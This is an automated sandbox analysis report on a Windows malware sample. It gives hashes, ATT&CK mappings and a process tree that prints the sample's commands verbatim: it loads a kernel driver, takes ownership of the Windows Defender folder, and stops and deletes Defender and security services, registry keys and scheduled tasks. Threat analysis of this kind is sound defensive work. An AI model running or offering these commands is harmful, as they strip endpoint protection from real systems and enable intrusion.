cf70392e26ee7d6d24cb39499567052935664d37a1b49572f9d0b5f3f3189f57

Analysis

max time kernel
108s
max time network
138s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
01/04/2025, 18:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-04-01_fda2e2ddccb519a2c1fb72dcaee2de6f_black-basta_cova_luca-stealer.exe
Size

327KB
MD5

fda2e2ddccb519a2c1fb72dcaee2de6f
SHA1

efd50828acc3e182aa283c5760278c0da1f428a6
SHA256

cf70392e26ee7d6d24cb39499567052935664d37a1b49572f9d0b5f3f3189f57
SHA512

28c79ed9a9d5db3920b7e942c66670eec02046fa3d751ad18e9b3597caab76645b194bfa18bb5925ecfb8d201a291a44ee427ef39632f673db39edc43111c3cf
SSDEEP

6144:RTouKrWBEu3/Z2lpGDHU3ykJV9r/R5K7V7NRZfUlyT/8:RToPWBv/cpGrU3yerRKV7feluk

Score

10^/10

defense_evasion discovery execution exploit persistence

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
2824	icacls.exe
2496	takeown.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation	2025-04-01_fda2e2ddccb519a2c1fb72dcaee2de6f_black-basta_cova_luca-stealer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation	261.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation	261.exe

Executes dropped EXE 2 IoCs

pid	Process
3548	261.exe
2408	261.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2496	takeown.exe
2824	icacls.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3860	sc.exe
3380	sc.exe
4000	sc.exe
1564	sc.exe
4280	sc.exe
3792	sc.exe
3296	sc.exe
672	sc.exe
2052	sc.exe
984	sc.exe
3544	sc.exe
2988	sc.exe
4164	sc.exe
4908	sc.exe
4580	sc.exe
1300	sc.exe
5096	sc.exe
4244	sc.exe
4016	sc.exe
1860	sc.exe
1980	sc.exe
4456	sc.exe
2452	sc.exe
1800	sc.exe
4860	sc.exe
2068	sc.exe
2780	sc.exe
1588	sc.exe
4884	sc.exe
3620	sc.exe
3928	sc.exe
2056	sc.exe
440	sc.exe
2196	sc.exe
3004	sc.exe
4812	sc.exe
1400	sc.exe
4636	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-04-01_fda2e2ddccb519a2c1fb72dcaee2de6f_black-basta_cova_luca-stealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	261.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	261.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
2332	timeout.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
660	Process not Found
660	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2908 wrote to memory of 3548	2908	2025-04-01_fda2e2ddccb519a2c1fb72dcaee2de6f_black-basta_cova_luca-stealer.exe	87
PID 2908 wrote to memory of 3548	2908	2025-04-01_fda2e2ddccb519a2c1fb72dcaee2de6f_black-basta_cova_luca-stealer.exe	87
PID 2908 wrote to memory of 3548	2908	2025-04-01_fda2e2ddccb519a2c1fb72dcaee2de6f_black-basta_cova_luca-stealer.exe	87
PID 3548 wrote to memory of 1380	3548	261.exe	90
PID 3548 wrote to memory of 1380	3548	261.exe	90
PID 1380 wrote to memory of 2408	1380	cmd.exe	92
PID 1380 wrote to memory of 2408	1380	cmd.exe	92
PID 1380 wrote to memory of 2408	1380	cmd.exe	92
PID 2408 wrote to memory of 4032	2408	261.exe	93
PID 2408 wrote to memory of 4032	2408	261.exe	93
PID 4032 wrote to memory of 4884	4032	cmd.exe	96
PID 4032 wrote to memory of 4884	4032	cmd.exe	96
PID 4032 wrote to memory of 2988	4032	cmd.exe	97
PID 4032 wrote to memory of 2988	4032	cmd.exe	97
PID 4032 wrote to memory of 2332	4032	cmd.exe	98
PID 4032 wrote to memory of 2332	4032	cmd.exe	98
PID 4032 wrote to memory of 3620	4032	cmd.exe	99
PID 4032 wrote to memory of 3620	4032	cmd.exe	99
PID 4032 wrote to memory of 4812	4032	cmd.exe	100
PID 4032 wrote to memory of 4812	4032	cmd.exe	100
PID 4032 wrote to memory of 2496	4032	cmd.exe	101
PID 4032 wrote to memory of 2496	4032	cmd.exe	101
PID 4032 wrote to memory of 2824	4032	cmd.exe	102
PID 4032 wrote to memory of 2824	4032	cmd.exe	102
PID 4032 wrote to memory of 4164	4032	cmd.exe	103
PID 4032 wrote to memory of 4164	4032	cmd.exe	103
PID 4032 wrote to memory of 440	4032	cmd.exe	104
PID 4032 wrote to memory of 440	4032	cmd.exe	104
PID 4032 wrote to memory of 696	4032	cmd.exe	105
PID 4032 wrote to memory of 696	4032	cmd.exe	105
PID 4032 wrote to memory of 4908	4032	cmd.exe	106
PID 4032 wrote to memory of 4908	4032	cmd.exe	106
PID 4032 wrote to memory of 3928	4032	cmd.exe	107
PID 4032 wrote to memory of 3928	4032	cmd.exe	107
PID 4032 wrote to memory of 552	4032	cmd.exe	108
PID 4032 wrote to memory of 552	4032	cmd.exe	108
PID 4032 wrote to memory of 3860	4032	cmd.exe	109
PID 4032 wrote to memory of 3860	4032	cmd.exe	109
PID 4032 wrote to memory of 4860	4032	cmd.exe	110
PID 4032 wrote to memory of 4860	4032	cmd.exe	110
PID 4032 wrote to memory of 3408	4032	cmd.exe	111
PID 4032 wrote to memory of 3408	4032	cmd.exe	111
PID 4032 wrote to memory of 3380	4032	cmd.exe	112
PID 4032 wrote to memory of 3380	4032	cmd.exe	112
PID 4032 wrote to memory of 4000	4032	cmd.exe	113
PID 4032 wrote to memory of 4000	4032	cmd.exe	113
PID 4032 wrote to memory of 4516	4032	cmd.exe	114
PID 4032 wrote to memory of 4516	4032	cmd.exe	114
PID 4032 wrote to memory of 2068	4032	cmd.exe	115
PID 4032 wrote to memory of 2068	4032	cmd.exe	115
PID 4032 wrote to memory of 5096	4032	cmd.exe	116
PID 4032 wrote to memory of 5096	4032	cmd.exe	116
PID 4032 wrote to memory of 5024	4032	cmd.exe	117
PID 4032 wrote to memory of 5024	4032	cmd.exe	117
PID 4032 wrote to memory of 2196	4032	cmd.exe	118
PID 4032 wrote to memory of 2196	4032	cmd.exe	118
PID 4032 wrote to memory of 2780	4032	cmd.exe	119
PID 4032 wrote to memory of 2780	4032	cmd.exe	119
PID 4032 wrote to memory of 888	4032	cmd.exe	120
PID 4032 wrote to memory of 888	4032	cmd.exe	120
PID 4032 wrote to memory of 672	4032	cmd.exe	121
PID 4032 wrote to memory of 672	4032	cmd.exe	121
PID 4032 wrote to memory of 2052	4032	cmd.exe	122
PID 4032 wrote to memory of 2052	4032	cmd.exe	122

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\2025-04-01_fda2e2ddccb519a2c1fb72dcaee2de6f_black-basta_cova_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-04-01_fda2e2ddccb519a2c1fb72dcaee2de6f_black-basta_cova_luca-stealer.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2908
- C:\Users\Admin\AppData\Local\Temp\261.exe
  "C:\Users\Admin\AppData\Local\Temp\261.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3548
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A8C3.tmp\A8C4.tmp\A8C5.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1380
  - - C:\Users\Admin\AppData\Local\Temp\261.exe
      "C:\Users\Admin\AppData\Local\Temp\261.exe" go
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2408
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A9BD.tmp\A9BE.tmp\A9BF.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
        5⤵
        Drops file in Program Files directory
        Suspicious use of WriteProcessMemory
        
        PID:4032
      - C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        6⤵
        Launches sc.exe
        
        PID:4884
      - C:\Windows\system32\sc.exe
        
        sc start ddrver
        6⤵
        Launches sc.exe
        
        PID:2988
      - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        6⤵
        Delays execution with timeout.exe
        
        PID:2332
      - C:\Windows\system32\sc.exe
        
        sc stop ddrver
        6⤵
        Launches sc.exe
        
        PID:3620
      - C:\Windows\system32\sc.exe
        
        sc start ddrver
        6⤵
        Launches sc.exe
        
        PID:4812
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2496
      - C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2824
      - C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        6⤵
        Launches sc.exe
        
        PID:4164
      - C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        6⤵
        Launches sc.exe
        
        PID:440
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        6⤵
        
        PID:696
      - C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        6⤵
        Launches sc.exe
        
        PID:4908
      - C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        6⤵
        Launches sc.exe
        
        PID:3928
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        6⤵
        
        PID:552
      - C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        6⤵
        Launches sc.exe
        
        PID:3860
      - C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        6⤵
        Launches sc.exe
        
        PID:4860
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        6⤵
        
        PID:3408
      - C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        6⤵
        Launches sc.exe
        
        PID:3380
      - C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        6⤵
        Launches sc.exe
        
        PID:4000
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        6⤵
        
        PID:4516
      - C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        6⤵
        Launches sc.exe
        
        PID:2068
      - C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        6⤵
        Launches sc.exe
        
        PID:5096
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        6⤵
        Modifies security service
        
        PID:5024
      - C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        6⤵
        Launches sc.exe
        
        PID:2196
      - C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        6⤵
        Launches sc.exe
        
        PID:2780
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        6⤵
        
        PID:888
      - C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        6⤵
        Launches sc.exe
        
        PID:672
      - C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        6⤵
        Launches sc.exe
        
        PID:2052
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        6⤵
        
        PID:2388
      - C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        6⤵
        Launches sc.exe
        
        PID:4244
      - C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        6⤵
        Launches sc.exe
        
        PID:4580
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        6⤵
        
        PID:448
      - C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        6⤵
        Launches sc.exe
        
        PID:984
      - C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        6⤵
        Launches sc.exe
        
        PID:1564
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        6⤵
        
        PID:4028
      - C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        6⤵
        Launches sc.exe
        
        PID:4016
      - C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        6⤵
        Launches sc.exe
        
        PID:4280
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        6⤵
        
        PID:3752
      - C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        6⤵
        Launches sc.exe
        
        PID:1860
      - C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        6⤵
        Launches sc.exe
        
        PID:1300
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        6⤵
        
        PID:4620
      - C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        6⤵
        Launches sc.exe
        
        PID:1980
      - C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        6⤵
        Launches sc.exe
        
        PID:1400
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        6⤵
        
        PID:4220
      - C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        6⤵
        Launches sc.exe
        
        PID:3792
      - C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        6⤵
        Launches sc.exe
        
        PID:3544
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        6⤵
        
        PID:2288
      - C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        6⤵
        Launches sc.exe
        
        PID:4456
      - C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        6⤵
        Launches sc.exe
        
        PID:3296
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        6⤵
        
        PID:3084
      - C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        6⤵
        Launches sc.exe
        
        PID:4636
      - C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        6⤵
        Launches sc.exe
        
        PID:3004
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        6⤵
        
        PID:3140
      - C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        6⤵
        Launches sc.exe
        
        PID:2056
      - C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        6⤵
        Launches sc.exe
        
        PID:1588
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        6⤵
        
        PID:4792
      - C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        6⤵
        
        PID:1776
      - C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        6⤵
        
        PID:2184
      - C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        6⤵
        
        PID:780
      - C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        6⤵
        
        PID:1336
      - C:\Windows\system32\sc.exe
        
        sc stop ddrver
        6⤵
        Launches sc.exe
        
        PID:2452
      - C:\Windows\system32\sc.exe
        
        sc delete ddrver
        6⤵
        Launches sc.exe
        
        PID:1800

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\261.exe

Filesize
88KB

MD5
89ccc29850f1881f860e9fd846865cad

SHA1
d781641be093f1ea8e3a44de0e8bcc60f3da27d0

SHA256
4d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3

SHA512
0ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8C3.tmp\A8C4.tmp\A8C5.bat

Filesize
1KB

MD5
e5ddb7a24424818e3b38821cc50ee6fd

SHA1
97931d19f71b62b3c8a2b104886a9f1437e84c48

SHA256
4734305286027757086ef56b9033319ec92c3756e3ca41d7bf22c631d392e1ea

SHA512
450101acf9a4a39990d0cb0863794c0852fdf14f37a577af520fe7793b4ed70b5dd07a74f9fec42d9f762b4f45140eca75442b0ce76585a2c2646af64ffc4d21

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads